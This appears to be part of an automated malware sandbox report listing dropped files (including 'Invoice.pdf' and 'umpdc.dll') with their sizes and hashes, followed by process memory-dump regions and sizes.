C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\info.txtFilesize
174KB
MD584b90b27b759c98f05d35e2936939ea2
SHA10a398991b1559455da5333b696da112af07f028e
SHA256161854614e6405d6899e19409cee5fc8b08fc08a0c52c208593c059f93b869f8
SHA512b1aa38152af47a156a426794d2d2a4560a736ff7447a54327df629bb9e09c8a22d54360615dc73ba4ed435c188a2b07d13962b6823a30bc1a8c0647d0e64e564
-
C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\umpdc.dllFilesize
391KB
MD51570c92c1c5f039c438295ac68ff7e82
SHA13ee6c1d3582361e8af4efec44b1d1420494ab728
SHA256b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4
SHA512fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992
-
C:\Users\Admin\Downloads\Invoice.pdfFilesize
6KB
MD5662e6c1a869b8a4abc54a7ed8bc23088
SHA1c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4
SHA25615d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140
SHA5125bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99
-
memory/816-172-0x0000000000000000-mapping.dmp
-
memory/1152-140-0x0000000006230000-0x000000000624A000-memory.dmpFilesize
104KB
-
memory/1152-138-0x0000000005D30000-0x0000000005D4E000-memory.dmpFilesize
120KB
-
memory/1152-133-0x0000000004990000-0x00000000049C6000-memory.dmpFilesize
216KB
-
memory/1152-132-0x0000000000000000-mapping.dmp
-
memory/1152-137-0x0000000005710000-0x0000000005776000-memory.dmpFilesize
408KB
-
memory/1152-134-0x0000000005000000-0x0000000005628000-memory.dmpFilesize
6.2MB
-
memory/1152-135-0x0000000004E80000-0x0000000004EA2000-memory.dmpFilesize
136KB
-
memory/1152-136-0x00000000056A0000-0x0000000005706000-memory.dmpFilesize
408KB
-
memory/1152-139-0x0000000007590000-0x0000000007C0A000-memory.dmpFilesize
6.5MB
-
memory/1240-187-0x0000000000000000-mapping.dmp
-
memory/1440-157-0x0000000000000000-mapping.dmp
-
memory/2316-156-0x0000000000000000-mapping.dmp
-
memory/2764-147-0x0000000000000000-mapping.dmp
-
memory/3084-159-0x0000000000000000-mapping.dmp
-
memory/3392-186-0x00007FF9239B0000-0x00007FF923BA5000-memory.dmpFilesize
2.0MB
-
memory/3392-174-0x0000000000000000-mapping.dmp
-
memory/3644-184-0x0000000000000000-mapping.dmp
-
memory/3696-189-0x0000000000000000-mapping.dmp
-
memory/3936-181-0x00000279FE480000-0x00000279FE4C4000-memory.dmpFilesize
272KB
-
memory/3936-180-0x0000000000000000-mapping.dmp
-
memory/3936-182-0x00000279FE740000-0x00000279FE7BE000-memory.dmpFilesize
504KB
-
memory/4316-192-0x0000000000000000-mapping.dmp
-
memory/4468-185-0x0000000000000000-mapping.dmp
-
memory/4516-162-0x0000000000000000-mapping.dmp
-
memory/4652-143-0x0000000006FD0000-0x0000000007046000-memory.dmpFilesize
472KB
-
memory/4652-150-0x00000000709C0000-0x0000000070A0C000-memory.dmpFilesize
304KB
-
memory/4652-155-0x0000000007F40000-0x0000000007F4A000-memory.dmpFilesize
40KB
-
memory/4652-154-0x0000000007F20000-0x0000000007F32000-memory.dmpFilesize
72KB
-
memory/4652-153-0x0000000007E80000-0x0000000007E8A000-memory.dmpFilesize
40KB
-
memory/4652-152-0x00000000076A0000-0x00000000076BE000-memory.dmpFilesize
120KB
-
memory/4652-151-0x0000000070B30000-0x0000000070E84000-memory.dmpFilesize
3.3MB
-
memory/4652-141-0x0000000000000000-mapping.dmp
-
memory/4652-149-0x0000000007D50000-0x0000000007D82000-memory.dmpFilesize
200KB
-
memory/4652-146-0x0000000008300000-0x00000000088A4000-memory.dmpFilesize
5.6MB
-
memory/4652-145-0x0000000007310000-0x0000000007332000-memory.dmpFilesize
136KB
-
memory/4652-144-0x0000000007380000-0x0000000007416000-memory.dmpFilesize
600KB
-
memory/4652-142-0x0000000006E70000-0x0000000006EB4000-memory.dmpFilesize
272KB
-
memory/4872-167-0x0000000000000000-mapping.dmp